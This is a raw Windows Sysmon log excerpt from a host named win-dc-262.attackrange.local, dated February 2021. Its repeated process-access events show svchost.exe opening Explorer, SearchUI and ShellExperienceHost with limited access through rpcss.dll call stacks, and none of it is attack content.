21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205140Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205139Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205138Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205137Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205136Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205135Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205134Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205133Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205132Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205131Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205130Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205129Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205128Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.176{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205127Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.175{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205126Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.175{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205125Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.175{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205124Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.175{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791